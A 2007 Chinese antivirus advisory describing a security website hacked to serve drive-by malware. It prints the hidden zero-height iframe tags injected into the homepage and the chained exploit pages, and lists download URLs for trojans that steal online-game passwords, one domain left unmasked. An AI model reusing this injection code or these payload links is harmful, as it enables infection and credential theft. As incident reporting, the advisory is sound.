安全响应·Security
病毒预警·Alarm

天网安全阵线网站挂马事件

出处:安天实验室 2007-10-31 13:20

内容:
 

  10月31日,安天实验室反病毒监测网发现,天网安全阵线网站 (http://pfw.***.net.cn/)
被黑客植入病毒,用户如果访问该网站,会被病毒感染。系统就会自动从恶意网站上下载并运
行多个恶意程序。盗取用户敏感信息。
  
  该网站的主页上里被插入如下框架:

  

  框架代码:
  <iframe src=http://www.smsuni****.com/104/
  width=100 height=0 frameborder=0></iframe>。
  http://www.smsuni****.com/104/里被插入一个挂马代码,如下代码图2所示:

  

  4个框架
  <iframe src=http://www.smsuni****.com/104/111/001.htm
  width=50 height=0></iframe>
  <iframe src=http://www.smsuni****.com/104/222/002.htm
  width=0 height=0></iframe>
  <iframe src=http://www.smsuni****.com/104/333/003.htm
  width=0 height=0></iframe>
  <iframe src=http://www.smsuni****.com/104/xl/ok.asp
  width=0 height=0></iframe>
  http://www.smsuni****.com/104/111/001.htm得到如下代码:
  
  

  微软光标漏洞网马。
  http://www.smsuni****.com/104/222/002.htm得到结果如下:

  

  http://www.smsuni****.com/104/333/003.htm网马代码如下:

  

  http://www.smsuni****.com/104/xl/ok.asp里被插入代码
  <script src="okkt.js"></script>
  okkt.js代码如下:

  

  讯雷漏洞加密网马。
  当用户访问http://pfw.***.net.cn时,系统会自动隐藏下载以下病毒文件:
  http://www.smsuni****.com/104/1.exe
  病毒名:(Trojan-Downloader.Win32.Agent.buv) 下载者木马
  
  一旦运行该木马将下载以下病毒到用户的系统,并运行。

  http://dow.18****.com/menghuan.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.giv) 游戏木马

  http://dow.18****.com/moyu.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.gmh) 游戏盗号木马
  
  http://dow.18****.com/zhengtu.exe
  病毒名:(Trojan-Dropper.Win32.Delf.af) 盗号木马

  http://dow.18****.com/dahua.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.gnc) 盗号木马

  http://dow.18****.com/potian.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.gmn) 游戏盗号木马

  http://dow.18****.com/fengyun.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.gmz) 游戏盗号木马

  http://dow.18****.com/wanmei.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.gjr) 盗号木马

  http://dow.18****.com/zhuxian.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.gnb) 盗号木马

  http://dow.18****.com/wulin.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.gih) 游戏盗号木马

  http://dow.18****.com/jianghu.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.gfd) 游戏木马

  http://dow.118****.com/ms.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.gjs) 游戏盗号木马

  http://dow.18****.com/tianlong.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.fyp) 游戏盗号木马

  http://dow.18****.com/wendao.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.fyj) 游戏盗号木马

  http://dow.18****.com/dahua3.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.gmf) 游戏盗号木马

  http://dow.18****.com/huaxia.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.gmj) 游戏木马

  http://dow.18****.com/qiji.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.gkc) 游戏盗号木马

  http://dow.18****.com/daojian.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.ftl) 游戏木马

  http://dow.18****.com/guangzhi.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.fra) 游戏木马

  http://dow.18****.com/menghuan1.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.fzp) 游戏木马

  http://dow.183858.com/jianxia.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.fzm) 游戏木马

  http://dow.18****.com/zhengtu1.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.gnc) 游戏木马
附:
 

点击此处下载木马防线2005+

病毒上报信箱: submit@virusview.net
[TOP]